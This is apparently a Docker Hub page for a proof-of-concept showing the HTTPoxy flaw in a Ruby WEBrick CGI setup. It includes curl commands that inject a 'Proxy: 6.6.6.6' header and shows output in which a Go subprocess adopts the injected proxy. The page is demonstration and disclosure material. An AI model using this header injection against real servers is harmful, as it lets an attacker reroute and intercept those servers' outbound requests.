Public | Automated Build

Last pushed: a year ago
Short Description
A contrived example of the HTTPoxy (https://httpoxy.org/) vulnerability for a Ruby WEBrick server
Full Description

Ruby HTTPoxy PoC (gordonchan/ruby-httpoxy)

A somewhat contrived example of the HTTPoxy vulnerability for a Ruby WEBrick server that is serving CGI scripts. Demonstrates:

  • WEBrick::HTTPRequest prepends headers with "HTTP_" and WEBrick::HTTPServlet::CGIHandler lets the HTTP_PROXY header become an environment variable. Same deal with Apache server.
  • Ruby net/http is not vulnerable as per URI::Generic#find_proxy.
  • But if the Ruby CGI script calls a system program that uses an affected HTTP client (e.g. Go net/http), the HTTP_PROXY environment variable will be respected and its value will be used for outbound HTTP requests. :(

Quick Start:

$ ./server
$ curl -H "Proxy: 6.6.6.6" localhost:4000/ruby.cgi -v

With Docker:

$ docker run --rm -p 4000:4000 gordonchan/ruby-httpoxy
$ curl -H "Proxy: 6.6.6.6" $(docker-machine ip):4000/ruby.cgi -v

With Docker (Apache):

$ docker run --rm -p 80:80 gordonchan/ruby-apache-httpoxy
$ curl -H "Proxy: 6.6.6.6" $(docker-machine ip):80/ruby.cgi -v

Observed Output

*   Trying ::1...
* Connected to localhost (::1) port 4000 (#0)
> GET /ruby.cgi HTTP/1.1
> Host: localhost:4000
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy: 6.6.6.6
>
< HTTP/1.1 200 OK
< Content-Type: text/html
< Server: WEBrick/1.3.1 (Ruby/2.3.0/2015-12-25)
< Date: Tue, 02 Aug 2016 11:42:57 GMT
< Content-Length: 409
< Connection: Keep-Alive
<
HTTP_PROXY env:
ENV['HTTP_PROXY']  > 6.6.6.6

net/http proxy check:
NONE!

`./go-proxy-check` (system command):
In Go Land (using net/http)
Proxy: http://6.6.6.6

Notes:

License

ruby-httpoxy is Copyright (c) 2016 Gordon Chan and is released under the MIT License. It is free software, and may be redistributed under the terms specified in the LICENSE file.

Docker Pull Command
Owner
gordonchan
Source Repository

Comments (0)